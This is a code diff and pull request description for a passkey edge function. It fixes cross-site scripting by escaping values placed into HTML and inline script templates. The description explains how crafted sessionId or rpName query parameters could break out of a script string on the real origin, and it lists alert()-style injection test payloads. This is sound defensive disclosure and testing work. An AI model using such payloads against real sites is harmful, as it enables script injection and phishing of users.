-    .replace(/{{USER_ID}}/g, userId)
-    .replace(/{{EMAIL}}/g, email)
-    .replace(/{{SESSION_ID}}/g, sessionId)
-    .replace(/{{RP_ID}}/g, rpId)
-    .replace(/{{RP_NAME}}/g, rpName)
-    .replace(/{{ANON_KEY}}/g, anonKey);
+    .replace(/{{EMAIL_HTML}}/g, escapeHtml(email))
+    .replace(/{{CHALLENGE_JS}}/g, escapeJsString(challenge))
+    .replace(/{{USER_ID_JS}}/g, escapeJsString(userId))
+    .replace(/{{EMAIL_JS}}/g, escapeJsString(email))
+    .replace(/{{SESSION_ID_JS}}/g, escapeJsString(sessionId))
+    .replace(/{{RP_ID_JS}}/g, escapeJsString(rpId))
+    .replace(/{{RP_NAME_JS}}/g, escapeJsString(rpName))
+    .replace(/{{ANON_KEY_JS}}/g, escapeJsString(anonKey));
 }
 
 export async function getMobileAuthenticationHTML(
@@ -1121,18 +1159,19 @@ export async function getMobileAuthenticationHTML(
 ): Promise<string> {
   const anonKey = Deno.env.get("SUPABASE_ANON_KEY") || "";
   const createdAtFormatted = new Date(credentialCreatedAt).toLocaleDateString();
-  
+
   return AUTHENTICATION_TEMPLATE
-    .replace(/{{CHALLENGE}}/g, challenge)
-    .replace(/{{EMAIL}}/g, email)
-    .replace(/{{SESSION_ID}}/g, sessionId)
-    .replace(/{{RP_ID}}/g, rpId)
-    .replace(/{{CREDENTIAL_ID}}/g, credentialId)
-    .replace(/{{CREDENTIAL_DISPLAY_NAME}}/g, credentialDisplayName)
-    .replace(/{{CREDENTIAL_CREATED_AT}}/g, createdAtFormatted)
-    .replace(/{{ANON_KEY}}/g, anonKey);
+    .replace(/{{EMAIL_HTML}}/g, escapeHtml(email))
+    .replace(/{{CREDENTIAL_DISPLAY_NAME_HTML}}/g, escapeHtml(credentialDisplayName))
+    .replace(/{{CREDENTIAL_CREATED_AT_HTML}}/g, escapeHtml(createdAtFormatted))
+    .replace(/{{CHALLENGE_JS}}/g, escapeJsString(challenge))
+    .replace(/{{EMAIL_JS}}/g, escapeJsString(email))
+    .replace(/{{SESSION_ID_JS}}/g, escapeJsString(sessionId))
+    .replace(/{{RP_ID_JS}}/g, escapeJsString(rpId))
+    .replace(/{{CREDENTIAL_ID_JS}}/g, escapeJsString(credentialId))
+    .replace(/{{ANON_KEY_JS}}/g, escapeJsString(anonKey));
 }
 
 export async function getMobileErrorHTML(message: string): Promise<string> {
-  return ERROR_TEMPLATE.replace(/{{MESSAGE}}/g, message);
+  return ERROR_TEMPLATE.replace(/{{MESSAGE_HTML}}/g, escapeHtml(message));
 }


### PR DESCRIPTION
## Summary

`getMobileRegistrationHTML`/`getMobileAuthenticationHTML`/`getMobileErrorHTML` (`supabase/functions/passkey/utils/html.ts`) substituted every value into the returned HTML page with plain `String.replace()` and no escaping at all - into both HTML text and into single-quoted JavaScript string literals inside an inline `<script>` block.

`challenge` and `email` are constrained upstream (a base64url challenge matched against a stored row, `.email()` format validation), but `sessionId` (both `/register/mobile` and `/auth/mobile`) and `rpName` (`/register/mobile`) reach `routes/mobile.ts` as plain, unconstrained `z.string()` query parameters and are echoed straight through `services/mobile.ts` into the template with no character restriction anywhere on that path.

**Impact:** an attacker who knows a victim's email can call the public, unauthenticated challenge-issuing endpoint to obtain a real challenge and `credentialId` for that account, then send the victim a `/auth/mobile` (or `/register/mobile`) link with a crafted `sessionId` or `rpName` that breaks out of its JS string literal - closing the quote, running arbitrary script, and closing the surrounding `</script>` tag outright. The page is served from the real, trusted `api.risaboss.com` origin and also runs a genuine WebAuthn ceremony for the victim's own passkey, which makes this a convincing injection/phishing vector rather than a theoretical self-XSS.

## Fix

- Added `escapeHtml` (HTML-text context: `email`, `credentialDisplayName`, the error `message`) and `escapeJsString` (inline `<script>` string-literal context: `challenge`, `userId`, `email`, `sessionId`, `rpId`, `rpName`, `credentialId`) in `utils/html.ts`.
- `escapeJsString` escapes backslash/quote (so a value can't terminate its own literal early) and also neutralizes `<`/`>` so a value can't spell out `</script>` and close the surrounding script element - quote-escaping alone does not stop a `<script>`-context breakout.
- Template placeholders are renamed with `_HTML`/`_JS` suffixes per context, since `email` in particular is substituted into both an HTML-text spot and a script spot in the same template and needs different escaping at each - a single shared placeholder can't apply two different escaping functions.

## Tests

`tests/html.test.ts` (new): a same-payload regression proving a script-breakout string in `sessionId`/`rpName` cannot terminate its JS string literal or the surrounding `<script>` tag, an HTML-breakout payload in `email`/`credentialDisplayName`/the error message is entity-escaped, and benign values still round-trip readably in the final page (no over-escaping).

**Validation:** `deno check` across the whole function (all files pass), `deno test --allow-all` - 153 passed, 0 failed (includes the 7 new tests plus the full existing suite, unaffected).

## Test plan

- [x] `deno check` on every `.ts` file in `supabase/functions/passkey`
- [x] `deno test --allow-all` - 153/153 passing
- [ ] Deploy to a preview/staging project and manually confirm `/auth/mobile?...&sessionId=x'%3B alert(1)%3B//` renders the literal escaped text rather than executing

🤖 Generated with [Claude Code](https://claude.com/claude-code)

## Review follow-up (2026-09-11, maintainer review)

Review found one remaining gap in the escaping mechanism itself: `String.prototype.replace` applies `$`-pattern expansion (`$$`, `$&`, `$` + backtick, `$'`) to *string* replacement values, and that expansion runs **after** the escaping. Against the original head this meant:

- a `sessionId` of `$&` rendered the raw `{{SESSION_ID_JS}}` placeholder back into the page (and used it as the ceremony's sessionId, so the flow failed);
- `$$` collapsed to `$`, silently corrupting the value;
- a `$` + backtick `sessionId` spliced the entire pre-match document into the string literal, which kills the inline `<script>` (page JS SyntaxError, ceremony dead) for that crafted link.

None of these reach arbitrary code execution - the spliced fragments are template text with no attacker-controlled quotes - but the fix's own guarantee ("every value lands escaped, intact") did not hold. The fix: all 18 placeholder substitutions now use **function-form replacements** (`() => escapedValue`), which inserts the escaped value verbatim, with a comment pinning the reason. `tests/html.test.ts` gains a regression test covering every template.

Original contribution: the vulnerability analysis, both escapers, the per-context placeholder split, and the breakout regression tests are @Antriksh1984's. Validation at the new head: `deno check` clean, `deno test --allow-all` 154/154, `deno lint` unchanged from the PR head (the function's 21 pre-existing findings are untouched; the edge-functions workflow does not gate `dev`-targeted PRs).


## Claude review follow-up (2026-09-11, commit c434df6d4)

Claude Code Review (requested via @claude, run 34584248893) verdict at 5f889c21f: "the escaping is correct and complete for the stated threat model. No security defect found at this head." Its findings, applied in c434df6d4:

- **Single-pass render** (`renderTemplate`): a value that literally contains a later placeholder name (e.g. a `sessionId` of `{{ANON_KEY_JS}}`) is no longer expanded by a subsequent substitution.
- **Pinned the untested backslash rule**: a `x\'; alert(1); //` payload test that fails if the backslash rule is removed or reordered after the quote rule (mutation-verified both ways).
- **Pinned the untested CR/LF rule** (two-character escapes, not raw line breaks).
- **Closed the test asymmetry**: `$'` dollar pattern, exact `rpName` literal assertion, `&`-first ordering in `escapeHtml`, placeholder-in-value regression test.
- **Test env-var convention**: `SUPABASE_ANON_KEY` now set per test with try/finally (the `routes.test.ts` pattern) instead of a leaking module-top-level set.

Not applied: the semicolon point (function declarations take none - `deno lint` clean) and the optional U+2028/2029 note (legal in JS string literals in the target environments; review marked it non-blocking). Validation at c434df6d4: `deno check` clean, `deno test --allow-all` 157/157, `deno lint` unchanged (23 pre-existing/convention findings).
